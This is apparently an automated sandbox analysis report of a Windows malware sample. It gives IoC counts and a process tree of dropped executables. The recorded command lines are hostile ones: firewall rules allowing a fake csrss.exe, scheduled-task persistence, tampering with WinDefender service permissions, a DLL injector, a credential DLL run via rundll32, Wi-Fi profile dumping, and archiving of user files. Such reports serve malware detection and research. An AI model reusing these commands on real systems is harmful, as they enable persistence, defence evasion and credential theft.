Suspicious use of SendNotifyMessage 57 IoCs
Processes:
06e517567e.exechrome.exeu2i0.3.exepid process 3184 06e517567e.exe 3184 06e517567e.exe 3712 chrome.exe 3712 chrome.exe 3712 chrome.exe 3712 chrome.exe 3712 chrome.exe 3712 chrome.exe 3712 chrome.exe 3712 chrome.exe 3712 chrome.exe 3712 chrome.exe 3712 chrome.exe 3712 chrome.exe 3184 06e517567e.exe 3184 06e517567e.exe 3184 06e517567e.exe 3184 06e517567e.exe 3184 06e517567e.exe 3184 06e517567e.exe 3184 06e517567e.exe 3184 06e517567e.exe 3184 06e517567e.exe 3184 06e517567e.exe 3184 06e517567e.exe 3184 06e517567e.exe 3184 06e517567e.exe 3184 06e517567e.exe 3184 06e517567e.exe 3184 06e517567e.exe 3184 06e517567e.exe 3184 06e517567e.exe 3184 06e517567e.exe 3184 06e517567e.exe 3184 06e517567e.exe 3184 06e517567e.exe 3184 06e517567e.exe 3184 06e517567e.exe 3184 06e517567e.exe 3184 06e517567e.exe 3184 06e517567e.exe 3184 06e517567e.exe 3184 06e517567e.exe 3184 06e517567e.exe 3184 06e517567e.exe 3184 06e517567e.exe 3184 06e517567e.exe 3184 06e517567e.exe 3184 06e517567e.exe 3184 06e517567e.exe 5312 u2i0.3.exe 5312 u2i0.3.exe 5312 u2i0.3.exe 5312 u2i0.3.exe 5312 u2i0.3.exe 5312 u2i0.3.exe 5312 u2i0.3.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
run.exerun.exepid process 5208 run.exe 5208 run.exe 6132 run.exe 6132 run.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
6ff71066514f9902a3764a55ad402c6e02a80664c2edfd33984f34a61852f350.exeexplorta.exe06e517567e.exechrome.exedescription pid process target process PID 1372 wrote to memory of 4904 1372 6ff71066514f9902a3764a55ad402c6e02a80664c2edfd33984f34a61852f350.exe explorta.exe PID 1372 wrote to memory of 4904 1372 6ff71066514f9902a3764a55ad402c6e02a80664c2edfd33984f34a61852f350.exe explorta.exe PID 1372 wrote to memory of 4904 1372 6ff71066514f9902a3764a55ad402c6e02a80664c2edfd33984f34a61852f350.exe explorta.exe PID 4904 wrote to memory of 4884 4904 explorta.exe explorta.exe PID 4904 wrote to memory of 4884 4904 explorta.exe explorta.exe PID 4904 wrote to memory of 4884 4904 explorta.exe explorta.exe PID 4904 wrote to memory of 3164 4904 explorta.exe amert.exe PID 4904 wrote to memory of 3164 4904 explorta.exe amert.exe PID 4904 wrote to memory of 3164 4904 explorta.exe amert.exe PID 4904 wrote to memory of 3184 4904 explorta.exe 06e517567e.exe PID 4904 wrote to memory of 3184 4904 explorta.exe 06e517567e.exe PID 4904 wrote to memory of 3184 4904 explorta.exe 06e517567e.exe PID 3184 wrote to memory of 3712 3184 06e517567e.exe chrome.exe PID 3184 wrote to memory of 3712 3184 06e517567e.exe chrome.exe PID 3712 wrote to memory of 2416 3712 chrome.exe chrome.exe PID 3712 wrote to memory of 2416 3712 chrome.exe chrome.exe PID 3712 wrote to memory of 2612 3712 chrome.exe chrome.exe PID 3712 wrote to memory of 2612 3712 chrome.exe chrome.exe PID 3712 wrote to memory of 2612 3712 chrome.exe chrome.exe PID 3712 wrote to memory of 2612 3712 chrome.exe chrome.exe PID 3712 wrote to memory of 2612 3712 chrome.exe chrome.exe PID 3712 wrote to memory of 2612 3712 chrome.exe chrome.exe PID 3712 wrote to memory of 2612 3712 chrome.exe chrome.exe PID 3712 wrote to memory of 2612 3712 chrome.exe chrome.exe PID 3712 wrote to memory of 2612 3712 chrome.exe chrome.exe PID 3712 wrote to memory of 2612 3712 chrome.exe chrome.exe PID 3712 wrote to memory of 2612 3712 chrome.exe chrome.exe PID 3712 wrote to memory of 2612 3712 chrome.exe chrome.exe PID 3712 wrote to memory of 2612 3712 chrome.exe chrome.exe PID 3712 wrote to memory of 2612 3712 chrome.exe chrome.exe PID 3712 wrote to memory of 2612 3712 chrome.exe chrome.exe PID 3712 wrote to memory of 2612 3712 chrome.exe chrome.exe PID 3712 wrote to memory of 2612 3712 chrome.exe chrome.exe PID 3712 wrote to memory of 2612 3712 chrome.exe chrome.exe PID 3712 wrote to memory of 2612 3712 chrome.exe chrome.exe PID 3712 wrote to memory of 2612 3712 chrome.exe chrome.exe PID 3712 wrote to memory of 2612 3712 chrome.exe chrome.exe PID 3712 wrote to memory of 2612 3712 chrome.exe chrome.exe PID 3712 wrote to memory of 2612 3712 chrome.exe chrome.exe PID 3712 wrote to memory of 2612 3712 chrome.exe chrome.exe PID 3712 wrote to memory of 2612 3712 chrome.exe chrome.exe PID 3712 wrote to memory of 2612 3712 chrome.exe chrome.exe PID 3712 wrote to memory of 2612 3712 chrome.exe chrome.exe PID 3712 wrote to memory of 2612 3712 chrome.exe chrome.exe PID 3712 wrote to memory of 2612 3712 chrome.exe chrome.exe PID 3712 wrote to memory of 2612 3712 chrome.exe chrome.exe PID 3712 wrote to memory of 2612 3712 chrome.exe chrome.exe PID 3712 wrote to memory of 4848 3712 chrome.exe chrome.exe PID 3712 wrote to memory of 4848 3712 chrome.exe chrome.exe PID 3712 wrote to memory of 3552 3712 chrome.exe chrome.exe PID 3712 wrote to memory of 3552 3712 chrome.exe chrome.exe PID 3712 wrote to memory of 3552 3712 chrome.exe chrome.exe PID 3712 wrote to memory of 3552 3712 chrome.exe chrome.exe PID 3712 wrote to memory of 3552 3712 chrome.exe chrome.exe PID 3712 wrote to memory of 3552 3712 chrome.exe chrome.exe PID 3712 wrote to memory of 3552 3712 chrome.exe chrome.exe PID 3712 wrote to memory of 3552 3712 chrome.exe chrome.exe PID 3712 wrote to memory of 3552 3712 chrome.exe chrome.exe PID 3712 wrote to memory of 3552 3712 chrome.exe chrome.exe PID 3712 wrote to memory of 3552 3712 chrome.exe chrome.exe PID 3712 wrote to memory of 3552 3712 chrome.exe chrome.exe PID 3712 wrote to memory of 3552 3712 chrome.exe chrome.exe PID 3712 wrote to memory of 3552 3712 chrome.exe chrome.exe PID 3712 wrote to memory of 3552 3712 chrome.exe chrome.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\6ff71066514f9902a3764a55ad402c6e02a80664c2edfd33984f34a61852f350.exe"C:\Users\Admin\AppData\Local\Temp\6ff71066514f9902a3764a55ad402c6e02a80664c2edfd33984f34a61852f350.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\1000015001\amert.exe"C:\Users\Admin\AppData\Local\Temp\1000015001\amert.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\1000016001\06e517567e.exe"C:\Users\Admin\AppData\Local\Temp\1000016001\06e517567e.exe"3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account4⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcca0fab58,0x7ffcca0fab68,0x7ffcca0fab785⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1620 --field-trial-handle=1768,i,1864251316948117499,2617369535366440079,131072 /prefetch:25⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1768,i,1864251316948117499,2617369535366440079,131072 /prefetch:85⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2132 --field-trial-handle=1768,i,1864251316948117499,2617369535366440079,131072 /prefetch:85⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3016 --field-trial-handle=1768,i,1864251316948117499,2617369535366440079,131072 /prefetch:15⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3028 --field-trial-handle=1768,i,1864251316948117499,2617369535366440079,131072 /prefetch:15⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4212 --field-trial-handle=1768,i,1864251316948117499,2617369535366440079,131072 /prefetch:15⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4048 --field-trial-handle=1768,i,1864251316948117499,2617369535366440079,131072 /prefetch:15⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4516 --field-trial-handle=1768,i,1864251316948117499,2617369535366440079,131072 /prefetch:85⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4528 --field-trial-handle=1768,i,1864251316948117499,2617369535366440079,131072 /prefetch:85⤵
- Modifies registry class
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4756 --field-trial-handle=1768,i,1864251316948117499,2617369535366440079,131072 /prefetch:85⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4944 --field-trial-handle=1768,i,1864251316948117499,2617369535366440079,131072 /prefetch:85⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5092 --field-trial-handle=1768,i,1864251316948117499,2617369535366440079,131072 /prefetch:85⤵
-
C:\Users\Admin\1000017002\1d10cce2fa.exe"C:\Users\Admin\1000017002\1d10cce2fa.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exeC:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe"C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1332 -s 9123⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe"C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
-
C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe"C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe"4⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe"C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"4⤵
-
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 35⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 3923⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe"C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4452 -s 4003⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe"C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe" /F3⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\1000228001\ISetup8.exe"C:\Users\Admin\AppData\Local\Temp\1000228001\ISetup8.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\u2i0.0.exe"C:\Users\Admin\AppData\Local\Temp\u2i0.0.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\u2i0.2\run.exe"C:\Users\Admin\AppData\Local\Temp\u2i0.2\run.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe5⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe6⤵
-
C:\Users\Admin\AppData\Local\Temp\u2i0.3.exe"C:\Users\Admin\AppData\Local\Temp\u2i0.3.exe"4⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD15⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3240 -s 15724⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000229001\toolspub1.exe"C:\Users\Admin\AppData\Local\Temp\1000229001\toolspub1.exe"3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5172 -s 3844⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000230001\4767d2e713f2021e8fe856e3ea638b58.exe"C:\Users\Admin\AppData\Local\Temp\1000230001\4767d2e713f2021e8fe856e3ea638b58.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
-
C:\Users\Admin\AppData\Local\Temp\1000230001\4767d2e713f2021e8fe856e3ea638b58.exe"C:\Users\Admin\AppData\Local\Temp\1000230001\4767d2e713f2021e8fe856e3ea638b58.exe"4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes6⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
-
C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe"C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe"C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\1000231001\lie.exe"C:\Users\Admin\AppData\Local\Temp\1000231001\lie.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main2⤵
- Loads dropped DLL
-
C:\Windows\system32\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main3⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\netsh.exenetsh wlan show profiles4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\938118698296_Desktop.zip' -CompressionLevel Optimal4⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\1000238001\file300un.exe"C:\Users\Admin\AppData\Local\Temp\1000238001\file300un.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"3⤵
-
C:\Users\Admin\Pictures\JsU0mIy1ntpEgKLvpkZIxeHv.exe"C:\Users\Admin\Pictures\JsU0mIy1ntpEgKLvpkZIxeHv.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\u1rs.0.exe"C:\Users\Admin\AppData\Local\Temp\u1rs.0.exe"5⤵
- Executes dropped EXE
- Checks processor information in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5964 -s 34326⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\u1rs.2\run.exe"C:\Users\Admin\AppData\Local\Temp\u1rs.2\run.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe6⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe7⤵
-
C:\Users\Admin\AppData\Local\Temp\u1rs.3.exe"C:\Users\Admin\AppData\Local\Temp\u1rs.3.exe"5⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2296 -s 15525⤵
- Program crash
-
C:\Users\Admin\Pictures\0uGYhodtbvJDiZVw84LSAglJ.exe"C:\Users\Admin\Pictures\0uGYhodtbvJDiZVw84LSAglJ.exe"4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
-
C:\Users\Admin\Pictures\0uGYhodtbvJDiZVw84LSAglJ.exe"C:\Users\Admin\Pictures\0uGYhodtbvJDiZVw84LSAglJ.exe"5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"6⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes7⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F7⤵
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll7⤵
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F7⤵
- Creates scheduled task(s)
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"7⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)8⤵
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)9⤵
- Launches sc.exe
-
C:\Users\Admin\Pictures\wPMduSZ8juY1TDHBUix0ljLR.exe"C:\Users\Admin\Pictures\wPMduSZ8juY1TDHBUix0ljLR.exe"4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
-
C:\Users\Admin\Pictures\wPMduSZ8juY1TDHBUix0ljLR.exe"C:\Users\Admin\Pictures\wPMduSZ8juY1TDHBUix0ljLR.exe"5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"6⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes7⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
-
C:\Users\Admin\Pictures\87SWjL22hQPaCpSfqo5grzwC.exe"C:\Users\Admin\Pictures\87SWjL22hQPaCpSfqo5grzwC.exe"4⤵
- Modifies firewall policy service
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\BCeXl9xTBcqb6RTpV0ci0ClD.exe"C:\Users\Admin\Pictures\BCeXl9xTBcqb6RTpV0ci0ClD.exe" --silent --allusers=04⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
-
C:\Users\Admin\Pictures\BCeXl9xTBcqb6RTpV0ci0ClD.exeC:\Users\Admin\Pictures\BCeXl9xTBcqb6RTpV0ci0ClD.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.68 --initial-client-data=0x2b0,0x2b4,0x2b8,0x28c,0x2bc,0x6af7e1d0,0x6af7e1dc,0x6af7e1e85⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\BCeXl9xTBcqb6RTpV0ci0ClD.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\BCeXl9xTBcqb6RTpV0ci0ClD.exe" --version5⤵
- Executes dropped EXE
- Loads dropped DLL
-
